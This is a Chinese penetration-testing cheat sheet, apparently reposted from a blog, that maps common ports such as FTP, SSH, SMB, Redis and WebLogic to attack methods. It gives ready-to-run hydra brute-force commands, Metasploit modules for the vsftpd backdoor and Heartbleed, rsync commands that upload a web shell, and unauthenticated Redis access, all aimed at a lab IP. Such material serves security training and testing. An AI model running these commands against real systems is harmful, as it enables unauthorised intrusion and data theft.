常见端口渗透

常见端口和服务

端口说明攻击方法
21FTP-文件传输协议弱口令、爆破、嗅探、后门
22ssh-安全隧道远程登陆弱口令、爆破
23telnet-远程连接弱口令、爆破、嗅探
25smtp-简单邮件传输协议邮件伪造
53domain-DNS域名解析服务DNS劫持、缓存投毒
80/443http服务常见Web漏洞、IIS写文件、OpenSSL
139Samba服务爆破、远程代码执行
445局域网共享ms-17010漏洞(Win7及之前版本)
873Rsync远程代码执行
1433MSSQL数据库爆破、SQL注入
2049NFS未授权访问
3306MySQL数据库爆破、SQL注入
3389rdp-远程桌面连接爆破、漏洞ms12-020
5432postgresql爆破、注入
5632Pcanywhere拒绝服务等漏洞、爆破
5900VNC远程登陆爆破、认证绕过
6379Redis未授权访问
7001/7002weblogicJava反序列化漏洞
9990jboss远程代码执行、Java反序列化

攻击方向

21(FTP)

默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)

爆破:
#anonymous匿名登陆
#弱口令 用户名:FTP 密码:FTP或为空或爆破
hydra -l FTP -P top10000.txt ftp://192.168.115.136
嗅探:

Ettercap(内网神器)

或msf模块

use auxiliary/sniffer/psnuffle
后门:

在特定版本的vsftpd服务器中,被人恶意植入代码,当用户名以”:)”为结尾

服务器就会在6200端口监听,并且能够执行任意代码(root)

use exploit/unix/ftp/vsftpd_234_backdoor
22(SSH)

爆破:

#可以采用上边那种或以下这种写法
hydra -l root -P top10000.txt 192.168.115.136 ssh -v
53(DNS)

内网使用Ettercap进行DNS劫持,钓鱼攻击

公网的话要能控制运营商网关

139(Smb)
爆破:
hydra -l root -P top10000.txt 192.168.115.136 smb -v
远程代码执行:

CVE-2015-0240

CVE-2017-7494

443(https)

检测:

心脏滴血在线检测

nmap -sV -p 8443 --script ssl-heartbleed 192.168.115.136

利用:

use auxiliary/scanner/ssl/openssl_heartbleed
873(Rsync)

未授权访问:

rsync -avz ip::wwwroot/目录   /root/  #下载目标主机上的文件到本机root目录
rsync -avz shell.php 192.168.3.xxx::wwwroot #上传文件
2049(NFS)

未授权访问

列出导出文件夹:

use auxiliary/scanner/nfs/nfsmount
6379(Redis)

未授权访问:

#没有密码,直接连接
redis-cli -h 192.168.115.136
#Redis命令
>info #查看主机信息

Redis未授权访问总结(1)

Redis未授权访问总结(2)

7001/7002(weblogic)

反序列化:CVE-2017-3248

 

转载于:https://www.cnblogs.com/wintrysec/p/10875185.html

  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值